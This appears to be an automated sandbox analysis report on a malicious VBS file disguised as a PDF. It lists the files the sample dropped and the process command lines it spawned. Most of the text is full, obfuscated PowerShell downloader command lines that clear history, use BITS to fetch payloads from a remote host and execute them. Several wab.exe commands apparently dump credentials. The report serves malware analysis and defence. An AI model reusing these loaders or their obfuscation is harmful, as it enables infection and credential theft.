Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
docs24129178208014180901747_pdf_08012024000000.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\vorspt.dat
|
data
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xb4ca4fe7, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_19c0e136-e795-4a8c-8d98-91194206ba9b\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_5c2c1573-def5-4530-9782-f6231d58cbf6\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_65ab8d0e-e459-4b7e-8470-23c86d3d1876\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_9835577c-e9cc-40e1-9779-6f0d3189d02c\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3589.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER35A8.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER35E7.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER35F8.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3675.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER36E3.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DA5.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E04.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Alarmtils.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\WER257B.tmp.WERDataCollectionStatus.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\WER259A.tmp.WERDataCollectionStatus.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\WER25B9.tmp.WERDataCollectionStatus.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\WER3D87.tmp.WERDataCollectionStatus.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbinu2n3.pjp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dylrllz1.nfa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ea0px3tr.dw0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0g0yo5s.wpm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwqzxfuh.ozj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp1exc31.5oh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\BIT7E8B.tmp
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\BITA28A.tmp
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Fejded.Ast (copy)
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Invultva.Bar (copy)
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 25 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\docs24129178208014180901747_pdf_08012024000000.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Clear-History;Clear-History;Function Brdf ([String]$Pilgri){$Opregn
= 5;For($Damperc=4; $Damperc -lt $Pilgri.Length-1; $Damperc+=$Opregn){ $Skotjsarbe4 = $Pilgri.Substring($Damperc, $Poler238);
$Skotjsarbe=$Skotjsarbe+$Skotjsarbe4; }$Skotjsarbe;}$Poler238 = (cmd /c 'echo 1 && exit');$Skotjsarbe01=Brdf ' Hahi InieExpexNonl
';$Skotjsarbe02=Brdf 'HexaTBytmrSjusaGnidn OmdsPermfFleleGuldrgardr VesiMeacnCautg Aku ';$Afstand = Brdf 'enwo\UnamsViljyDubbspredwBrakohovewPaam6Subt4Faul\SpokWAtebiYndenHatcdBebyoergowAdmisAlfrPPotsoBambwGenreNonmradviSAbsoh
KuheRobulGlomlTrac\ IndvHorn1Knok.Taxi0 Fun\ParapIndeoTretwDewbeBravrStorsDrikhToureUblalheftlSkum.Indse CraxCarneDyrk ';function
nondec ($Hippolog){& ($Skotjsarbe01) ($Hippolog);}$Krimina93=Brdf 'BilahCatftCoontTrskp geo:Dmme/Para/Berl8ildf5 Ele.Swee2Unsh0Appt9Unwi.Card1Coor7livr6Efte.Both4Undi6Bery/ZygoS
OffoClemo gastReflh KuliTomonstofgNomo.FrimhAtomhMrspkAsto>uprohBapttMisytSpalpMidd:wood/Stab/ChereElydc FaeoArkixskol.Brisp
Bart Leu/RietSRaveo maho Klot KomhChefiBrnenHologBedu.CemehTilbhTidsk Epi ';$Stvsug=$Krimina93.split([char]62);$Krimina93=$Stvsug[0];nondec
(Brdf 'Rune$TilvgBioglPhysodatabAfsla Till Asp:HaemDSniprSparebladdPartgTortiRestnMask2Tils=Twir$ Stre EpinVinavDebu:NudiwuseriOutnn
Furd Numi overFjel ') ;nondec (Brdf 'Dmpe$DiapgTasslUnwioBrocbTheraSeanlSolk:MesiDDissrOutkeAmmodDkkegGgeliDousnGymn6Frav=
Ade$DracDSelvr ThreDocidFintg EspiModunStal2Pigm+Auto$OverATrucf LydsMyldtSpatacrannIntedGenr ') ;nondec (Brdf ' Exp$TiergGranlUdgaoHissb
SupaCierlKben:PrepDInderLimoeBarddVidegTroliEnnenBrun3Jazz Crop=ompo Lobb(Uroc(GeoggKundwEgebm SpeiSubl VetwMandi litnAgyn3Muld2
Tel_CorvpHalfr CoroBaskcSkjoeTrnes unbsSide Marg-RiflFSter PreoP StrrEmpro LarcSpireArtiskalksmatrI PladEqui=Anfg$Ress{DublPSuppI
KulDEpic}Pens)Shad.ResiCSlseoGuttmOpbrmDamoa TurnLaridCoelLSmugiDessnDomaeskis)Char gob-SerpsLanup ReslNatuiPhlotSkip Kast[Saalc
ElehUdmeaDelfrThon]Dosa3Xeno4Quay ');nondec (Brdf ' Sol$SpilgSigjlEskaoPiesbKodeaSkuelBier:RagsDInterIndde DikdSpregAfseiWarbnFnik4
Lig Worr=Echi Ope$PoleDProfr ReneReladOrgag Swai LignNone3Anti[Disc$ JubDkerbr Shee FridAtrigKlami grsnPaci3Rank.Unilc AktoDefouHibenSurntMess-Rome2Caye]Unef
');nondec (Brdf 'Najn$AndegOfftlRuskoUnirb BataSivalKali:EndoDSjusrEaseeIleodfremgDissiVolpnMult5Snee= Ste(SoftTPucke BelsMenitLovi-TotaPDysfaLopetOpsuhIndr
Pol$ OvoDAlurrLegaeCantdSweegAbsui Arbnakva6Phyl)grun Nona- allASermnUndedpaab Arkt(arbe[shakI DisnChamtAxofPRavntSchfrEnog]Bide:Hand:
Kies Reii AlkzNatseHexa Bidr- RejeBilgqSuff Boos8Skol)Slvs ') ;if ($Dredgin5) {& $Dredgin6 $Dredgin4;} else {;$Skotjsarbe00=Brdf
'Gest$SambgVildlAflgoUnlibCommaShanlbsts:RedeDHandrDetee PandSimigAnariEftenSnoo8Smel Pell=Woad SpuSUdvitkartaBemrr CortToma-JoseBInteiNervt
EigsForfTPrior PeraTaxanTrylsTaktfDosieBojarKalo Fors-VasoSSillo HumuFrosr midcCopie Arm Tilb$ForkK ConrRodfiFibrmNonniProjnObsoaFana9fyld3Serv
Klin-coloDklereMesasNonttNovaicambn hjsaPreltMyrsiBetaoberenJumb Mark$BlokDForerNonme BosdDecagNilmiApprn Pyr2Tsub ';nondec
(Brdf 'Bedc$TricgCheclPreco LapbSpecaEjenlLoka:AnkeDBussrAnkeeWampdGerngQuoniBucknScol2Alca=Bicy$pyroePrisnaltiv Aer:ThuraAbolpChlopUdgidKompaAnnutHeteaSket
') ;nondec (Brdf 'nontIHomemLiftpDistobadlrNatitInju- RemM PitoRepadAareupolylmooreBevi BortBBliniStort ElesUforT BlarLiniaRepanAttrssttefCurvetrivrDode
') ;$Dredgin2=$Dredgin2+'\Invultva.Bar' ;nondec (Brdf 'Fish$ StigEpinlTelooprorb PykaCuralGlos: TidD Tvir AbbeKuvsdmonagstemiMedinTric7Flan=Troj(RnefTsepaeMahosGhantBill-ApokPMollaMdept
OathPatr Dia$HeldDStenrtilbeSpurd IrogselviLjenn Ove2Sikk)saml ') ;while (-not $Dredgin7) {nondec (Brdf 'SousIUnplf tra Udtr(Over$BaraD
HaurMobieSuicdColtg AnaiSupenAcro8Prec.TuetJCaulobrusbDobbSOxfot FloaDisctUnsaeTepa Alts-Denoekrabq Roo Yder$ CelS SorksnuroJaggtMopsjZonusGidsaconsr
Casb NoneStor0Meje2Busl) Pht Spe{BoksSAnantHypoa TverNecktPost-AnlgSBonal PreeSusceCoappDdbi Udmn1 tro} GereIndslTurrs Sane
Unp{FodbSTegntTeleaCargrSanbt Taw- EndS Fdel EveeKonkegigupBone Dgnk1Oils; mennOkseoTennnTeacdswiveSkancLepi Stil$SligSvagikUnzooVarvtToiljMenusSammaMcgurguanb
Reve Whe0Flja0Kanh}Time ');nondec (Brdf 'Kild$BrasgDopilFremoAimibGrotaPrlulTilg:StnkD Godr Rine SamdDuctg ThriProtnNego7Rabb=Vitr(KaneTMicreMorms
Undtouts-DresPTubeaInstt Sekh Ace Grnf$ParaD EmmrPlute SkadBlowgForsi Gran Mil2Jord)Somm ') ;$Krimina93=$Stvsug[$Udeholde++%$Stvsug.count];}nondec
(Brdf 'Srin$Reexg GlylPentoSupebShepaSikkl Bra:VentMTornyFangr Valt LipaKomplOverrGanteUdensMona jazz=Pers coesGInteeEugltUdpa-VanrCSideoYerkn
MaltJordeNotenSubttUnre Zulu$OvulD Toar InteLejedTelegAliciTorsnlati2Piff ');nondec (Brdf 'Inte$NedbgTilslEmolo Stib redaAfvrlBust:GasatAutoe
Rubl Inio Ago Sal=Isba requ[portSengeycites Mitt SpeeBetam Pid.DuopC Paso ScrnHaugv Fore FulrcelitKldn] Gri: for: HaaFSrberHarmonoakmuvilBLifeaMikrs
bereDest6Prej4BordSCoditMonorLauriAuktnkalig Int(Cond$BrndMAracyDoxorNonpt WidaRentl OrtrHoseeDactsOpsl)Sper ');nondec (Brdf
' Car$SkrigOranlNearoHemibYamma ProlRepr:buksSuntik StioAceltudenjChirsVldea ComrRetsbFungeGens2Chec Sout=Marm Vrt[ BleSMegayLibes
Tilt GoneElevm Sca.StudT ArveShorxAktitRadi.CompEImidnSubtc GruoTrandBarriSubjnGlaugBevr]Bris:Mobs:MulsAStatSGenoCMikrI TroIAcce.AbanGnidue
RestForsSDitet SerrTandifalhnRestgBejl(Viel$ManttUbode Socl SkioStor)Fond ');nondec (Brdf 'Offe$Udstg CoolUnheonewsbModeaForslUdeb:
ChiSCarrk NonoBelmt ClijStivs EroaNontr RambHngeeNeur3kine=Affa$ConfS ProkVolioPeratKarsjMintsHydraFirerRaadbRekiebryn2Demi.Solms
Oveu burbBndss GaltPaterSupri DennTurdgPlei(Nidi2Exoc5Eget8Misv2 Ter5chro1Spec,Salv1Plad8Flas8Conv1Sens7Gran)Conf ');nondec
$Skotjsarbe3;};;
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Clear-History;Clear-History;Function Brdf ([String]$Pilgri){$Opregn
= 5;For($Damperc=4; $Damperc -lt $Pilgri.Length-1; $Damperc+=$Opregn){ $Skotjsarbe4 = $Pilgri.Substring($Damperc, $Poler238);
$Skotjsarbe=$Skotjsarbe+$Skotjsarbe4; }$Skotjsarbe;}$Poler238 = (cmd /c 'echo 1 && exit');$Skotjsarbe01=Brdf ' Hahi InieExpexNonl
';$Skotjsarbe02=Brdf 'HexaTBytmrSjusaGnidn OmdsPermfFleleGuldrgardr VesiMeacnCautg Aku ';$Afstand = Brdf 'enwo\UnamsViljyDubbspredwBrakohovewPaam6Subt4Faul\SpokWAtebiYndenHatcdBebyoergowAdmisAlfrPPotsoBambwGenreNonmradviSAbsoh
KuheRobulGlomlTrac\ IndvHorn1Knok.Taxi0 Fun\ParapIndeoTretwDewbeBravrStorsDrikhToureUblalheftlSkum.Indse CraxCarneDyrk ';function
nondec ($Hippolog){& ($Skotjsarbe01) ($Hippolog);}$Krimina93=Brdf 'BilahCatftCoontTrskp geo:Dmme/Para/Berl8ildf5 Ele.Swee2Unsh0Appt9Unwi.Card1Coor7livr6Efte.Both4Undi6Bery/ZygoS
OffoClemo gastReflh KuliTomonstofgNomo.FrimhAtomhMrspkAsto>uprohBapttMisytSpalpMidd:wood/Stab/ChereElydc FaeoArkixskol.Brisp
Bart Leu/RietSRaveo maho Klot KomhChefiBrnenHologBedu.CemehTilbhTidsk Epi ';$Stvsug=$Krimina93.split([char]62);$Krimina93=$Stvsug[0];nondec
(Brdf 'Rune$TilvgBioglPhysodatabAfsla Till Asp:HaemDSniprSparebladdPartgTortiRestnMask2Tils=Twir$ Stre EpinVinavDebu:NudiwuseriOutnn
Furd Numi overFjel ') ;nondec (Brdf 'Dmpe$DiapgTasslUnwioBrocbTheraSeanlSolk:MesiDDissrOutkeAmmodDkkegGgeliDousnGymn6Frav=
Ade$DracDSelvr ThreDocidFintg EspiModunStal2Pigm+Auto$OverATrucf LydsMyldtSpatacrannIntedGenr ') ;nondec (Brdf ' Exp$TiergGranlUdgaoHissb
SupaCierlKben:PrepDInderLimoeBarddVidegTroliEnnenBrun3Jazz Crop=ompo Lobb(Uroc(GeoggKundwEgebm SpeiSubl VetwMandi litnAgyn3Muld2
Tel_CorvpHalfr CoroBaskcSkjoeTrnes unbsSide Marg-RiflFSter PreoP StrrEmpro LarcSpireArtiskalksmatrI PladEqui=Anfg$Ress{DublPSuppI
KulDEpic}Pens)Shad.ResiCSlseoGuttmOpbrmDamoa TurnLaridCoelLSmugiDessnDomaeskis)Char gob-SerpsLanup ReslNatuiPhlotSkip Kast[Saalc
ElehUdmeaDelfrThon]Dosa3Xeno4Quay ');nondec (Brdf ' Sol$SpilgSigjlEskaoPiesbKodeaSkuelBier:RagsDInterIndde DikdSpregAfseiWarbnFnik4
Lig Worr=Echi Ope$PoleDProfr ReneReladOrgag Swai LignNone3Anti[Disc$ JubDkerbr Shee FridAtrigKlami grsnPaci3Rank.Unilc AktoDefouHibenSurntMess-Rome2Caye]Unef
');nondec (Brdf 'Najn$AndegOfftlRuskoUnirb BataSivalKali:EndoDSjusrEaseeIleodfremgDissiVolpnMult5Snee= Ste(SoftTPucke BelsMenitLovi-TotaPDysfaLopetOpsuhIndr
Pol$ OvoDAlurrLegaeCantdSweegAbsui Arbnakva6Phyl)grun Nona- allASermnUndedpaab Arkt(arbe[shakI DisnChamtAxofPRavntSchfrEnog]Bide:Hand:
Kies Reii AlkzNatseHexa Bidr- RejeBilgqSuff Boos8Skol)Slvs ') ;if ($Dredgin5) {& $Dredgin6 $Dredgin4;} else {;$Skotjsarbe00=Brdf
'Gest$SambgVildlAflgoUnlibCommaShanlbsts:RedeDHandrDetee PandSimigAnariEftenSnoo8Smel Pell=Woad SpuSUdvitkartaBemrr CortToma-JoseBInteiNervt
EigsForfTPrior PeraTaxanTrylsTaktfDosieBojarKalo Fors-VasoSSillo HumuFrosr midcCopie Arm Tilb$ForkK ConrRodfiFibrmNonniProjnObsoaFana9fyld3Serv
Klin-coloDklereMesasNonttNovaicambn hjsaPreltMyrsiBetaoberenJumb Mark$BlokDForerNonme BosdDecagNilmiApprn Pyr2Tsub ';nondec
(Brdf 'Bedc$TricgCheclPreco LapbSpecaEjenlLoka:AnkeDBussrAnkeeWampdGerngQuoniBucknScol2Alca=Bicy$pyroePrisnaltiv Aer:ThuraAbolpChlopUdgidKompaAnnutHeteaSket
') ;nondec (Brdf 'nontIHomemLiftpDistobadlrNatitInju- RemM PitoRepadAareupolylmooreBevi BortBBliniStort ElesUforT BlarLiniaRepanAttrssttefCurvetrivrDode
') ;$Dredgin2=$Dredgin2+'\Invultva.Bar' ;nondec (Brdf 'Fish$ StigEpinlTelooprorb PykaCuralGlos: TidD Tvir AbbeKuvsdmonagstemiMedinTric7Flan=Troj(RnefTsepaeMahosGhantBill-ApokPMollaMdept
OathPatr Dia$HeldDStenrtilbeSpurd IrogselviLjenn Ove2Sikk)saml ') ;while (-not $Dredgin7) {nondec (Brdf 'SousIUnplf tra Udtr(Over$BaraD
HaurMobieSuicdColtg AnaiSupenAcro8Prec.TuetJCaulobrusbDobbSOxfot FloaDisctUnsaeTepa Alts-Denoekrabq Roo Yder$ CelS SorksnuroJaggtMopsjZonusGidsaconsr
Casb NoneStor0Meje2Busl) Pht Spe{BoksSAnantHypoa TverNecktPost-AnlgSBonal PreeSusceCoappDdbi Udmn1 tro} GereIndslTurrs Sane
Unp{FodbSTegntTeleaCargrSanbt Taw- EndS Fdel EveeKonkegigupBone Dgnk1Oils; mennOkseoTennnTeacdswiveSkancLepi Stil$SligSvagikUnzooVarvtToiljMenusSammaMcgurguanb
Reve Whe0Flja0Kanh}Time ');nondec (Brdf 'Kild$BrasgDopilFremoAimibGrotaPrlulTilg:StnkD Godr Rine SamdDuctg ThriProtnNego7Rabb=Vitr(KaneTMicreMorms
Undtouts-DresPTubeaInstt Sekh Ace Grnf$ParaD EmmrPlute SkadBlowgForsi Gran Mil2Jord)Somm ') ;$Krimina93=$Stvsug[$Udeholde++%$Stvsug.count];}nondec
(Brdf 'Srin$Reexg GlylPentoSupebShepaSikkl Bra:VentMTornyFangr Valt LipaKomplOverrGanteUdensMona jazz=Pers coesGInteeEugltUdpa-VanrCSideoYerkn
MaltJordeNotenSubttUnre Zulu$OvulD Toar InteLejedTelegAliciTorsnlati2Piff ');nondec (Brdf 'Inte$NedbgTilslEmolo Stib redaAfvrlBust:GasatAutoe
Rubl Inio Ago Sal=Isba requ[portSengeycites Mitt SpeeBetam Pid.DuopC Paso ScrnHaugv Fore FulrcelitKldn] Gri: for: HaaFSrberHarmonoakmuvilBLifeaMikrs
bereDest6Prej4BordSCoditMonorLauriAuktnkalig Int(Cond$BrndMAracyDoxorNonpt WidaRentl OrtrHoseeDactsOpsl)Sper ');nondec (Brdf
' Car$SkrigOranlNearoHemibYamma ProlRepr:buksSuntik StioAceltudenjChirsVldea ComrRetsbFungeGens2Chec Sout=Marm Vrt[ BleSMegayLibes
Tilt GoneElevm Sca.StudT ArveShorxAktitRadi.CompEImidnSubtc GruoTrandBarriSubjnGlaugBevr]Bris:Mobs:MulsAStatSGenoCMikrI TroIAcce.AbanGnidue
RestForsSDitet SerrTandifalhnRestgBejl(Viel$ManttUbode Socl SkioStor)Fond ');nondec (Brdf 'Offe$Udstg CoolUnheonewsbModeaForslUdeb:
ChiSCarrk NonoBelmt ClijStivs EroaNontr RambHngeeNeur3kine=Affa$ConfS ProkVolioPeratKarsjMintsHydraFirerRaadbRekiebryn2Demi.Solms
Oveu burbBndss GaltPaterSupri DennTurdgPlei(Nidi2Exoc5Eget8Misv2 Ter5chro1Spec,Salv1Plad8Flas8Conv1Sens7Gran)Conf ');nondec
$Skotjsarbe3;};;
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Alarmtils.vbs"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\karlogfpqegdwbunzzzvryidsvlysg
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\karlogfpqegdwbunzzzvryidsvlysg
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\karlogfpqegdwbunzzzvryidsvlysg
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uuwwozqremyqyhqzqkuwclcubcchlrosb
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fobop
|
|
|
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7272 -ip 7272
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Clear-History;Clear-History;Function Arkivkopie ([String]$Kjende){$Forsvarl
= 5;For($Treadl=4; $Treadl -lt $Kjende.Length-1; $Treadl+=$Forsvarl){ $Attributna4 = $Kjende.Substring($Treadl, $Dobbe); $Attributna=$Attributna+$Attributna4;
}$Attributna;}$Dobbe = (cmd /c 'echo 1 && exit');$Attributna01=Arkivkopie 'UnsaiNdlgeGaffxSkim ';$Attributna02=Arkivkopie
'VrdiT PosrAmera Clin ProsPiwufBarne UderpsitrStyliTndenSoeggBetr ';$Pilgri = Arkivkopie 'Beas\KkkesNaivyHovesUdfrwXylooCorvwGran6
Hns4Sems\KoveWScreiHaabnSickdKaneoChanwdagdstrosPAlcoo Pusw FreeStrirbenzSUnslhBetoe isplForpl Kbe\Begav Pin1Forp. Del0 Irr\PipipwestoBopywSnipeFrosr
Ords PrehStvleOblilBandlChur.Pinae VenxTagreLovk ';function Kultu ($Erefo){. ($Attributna01) ($Erefo);}$Cyan=Arkivkopie
' AarhOilmtRejstGrevpChef: sta/Illi/Sven8Dykn5Resa.Kowa2Dans0Dryp9Dood.Desp1Reto7Gaus6Outr.Pher4 Ite6Bran/AllicBatslisthiAfgin
TeloRaad. FedtSammtAbasfMarc>Indhh digtOpvatBikepTher:Afro/Vral/TurieEnercFlyto AnixUnst.ProjpCalvtNoni/ FigcMrkelBaakiSwinnOrano
Ope.BlootIntet MagfSemi ';$Anticata=$Cyan.split([char]62);$Cyan=$Anticata[0];Kultu (Arkivkopie 'deic$ErytgKlunlJuleoTempbUpspa
ApylSpoo:ForlBVariuAnkun VultImprmUnuraCoungEwale DecrSbeoi Leb2Cont=Anci$Fibeewhisn MarvGiga:Neutw Mami ParnUdspdSkiliRillr
Amb ') ;Kultu (Arkivkopie ' Cop$SuthgMerllMetaoCockbSkola AntlHamm:ParaB oveuSquinForptTeacmDesaaGldsgindkeClair AntiMudd6glan=Grip$SamfBGlykuKnetnDishtTilkmKlaraRopegphaneTilvr
Nvni Ans2Mora+Unux$DehiP ValisjovlTorogIsacrAnaliOver ') ;Kultu (Arkivkopie 'Lang$HypsgMikllplanoRundbNonaa SuplBrev:UnifBDeliu
GannBrantBarrmBoldaPostgPudre StarSingiFred3Bifo non=Sokk Inte(Ooph( UdggInfiwTohomLezeiSubk ParwHypiiWaltnSent3 Ver2Lind_
vetp tidrTestoAnticFjeneKvidsuddesVild Serv-ReliFSlid HomePMetarFagloBsnic ArteRapssgambsFarmIFishdbarr=Agen$Unde{KvajPMalaIDioxDanti}
Eri)Opga.DeceCNgleoNienmrrelmPickaBygonTilgdTegnL BloiUpstnondeenoni)Brow post-Brkks GaapSjoflBreviForstUnsi Reco[ErincGrnlhObraaRydnrHydr]Fler3Fore4
kro ');Kultu (Arkivkopie ' Off$PlapgSammlOpdeoFortbCarraScrolSubi:HuggBBrutuDislnUskytAccomomraaTilfg RigeFigur FleiEmph4poik
Dest=Kont dann$ NonB FriuGalanOffitabbemLystaKonsgFalleTrasr LaniWinn3 Fli[Slik$SpecBOmbruBaobnArrotYellmCykeaParegPreteSalirmisai
Ink3Sphr.Theoc Klio Albu Uben NontTurn-Reve2Bloo]cham ');Kultu (Arkivkopie 'Satu$Foregnotel Vano SelbJuleaAftvlFink:DislBFiksuRusln
AeqtpladmFernaVriegFrereMilorAirliOxhe5Cudd=Grns( mycT HydeFrassSammtMcki-VintPKancaAfiktlabohOver Hitt$ hypB FiluStyrn FertEvapmKloraTalegKlveeAilarDefeiBest6Udme)Synd
Indb-FlagAVkstnSkyddGour Snrl(Makh[JensIRyddn CoetBlanPAttitMenurFeat]Midt:Oxho:incos BibiNyhezSimoeUdhv For-Tilse LocqIndg
Nona8 Die)Sort ') ;if ($Buntmageri5) {& $Buntmageri6 $Buntmageri4;} else {;$Attributna00=Arkivkopie 'Odor$AlecgForklExteoGerhbToppaUdsklYdel:ParaBSmasuYestn
VkktAppemKabiaPhaggBirteRundr CooiHjlp8Indo Fag=Gamb OverS Appt SplaIngrrTrantHofd- MilBCheliEpintOnkesEcotT SubrSkuna UnenCoursJugufBruge
ManrMyoe Pre-GynaSDusioGouruFondrBolicMerveRupt Dast$blooCmesoyTaltaNaupnAlbi Stat-BrkjD RoyeCornsRaastNotciLevenstonaPolltOveri
CafoSletnGlut Remo$PrurBExtruErytnHauntNabimHjtraUning TeceHexerYokiiPhon2Gene ';Kultu (Arkivkopie ' Nis$Provg ExclLibeoMarbb
OcnaHerslSlov: MucBPseuuKvlnnopintElgemDustaCossgReddeSuperPlaniPram2Cent=Urov$FolleFilhnSulfvGang:AfhraCervpGoodpDribd skyaAfdrt
AlvaTumo ') ;Kultu (Arkivkopie ' AkkIudstm tigpPeisoantirWikitNati- AguMChemoElecd FluuEmbulSubfeOdor GoorBbromiFisktGrips
OveT crorHavdaSeminBryostetrfPneueEfterMelo ') ;$Buntmageri2=$Buntmageri2+'\Fejded.Ast' ;Kultu (Arkivkopie ' Bea$Schig AfdlBrakoCerab
SabaKatalDrej:SkndBRecauMyconBlastphonmRestaAmoegOleoeramprSkyliNonr7Sten=Tryk(OperT tegeTreksInvatInka- AccP LufaCepht TekhProc
Adap$GeodB Cceu arbnNicatOrdempatha FlygLease Konr VaniSaks2tele)Suff ') ;while (-not $Buntmageri7) {Kultu (Arkivkopie 'ForlIHoldfScio
Korp(Empi$DelaBPyopuYorunDecitMalmmIncoaMucogmorteMylorEgnsiYder8fors. AflJintioGammbWheeSValitJespaStattsamme Sen Whis-AcaneNectq
Cal Spli$ FanA Telt HemtlongrErhviAcrebMexiuHemitSlutn TilaHalt0Pdag2 Jin)Svin Morg{WindSOscit baraSmedrStiktMilj-BesgSKorrl
SaneBundeKommp Ele Isin1Hjts}Forle ProlXenisHyboe Ric{IndmSInsktHyoeaKnoprbundtApri-CreeSbibel DomeOmdieEntyp Lig Anfg1Dosh;ScufKBalkuImpalLatit
Carusamm fir$ProgAFiftt UnatLandr Liciadreb FrsuantitRejnnEsotaHaan0unfu0Frag}Yver ');Kultu (Arkivkopie 'Ente$SndagArbelBondoWiltbCessa
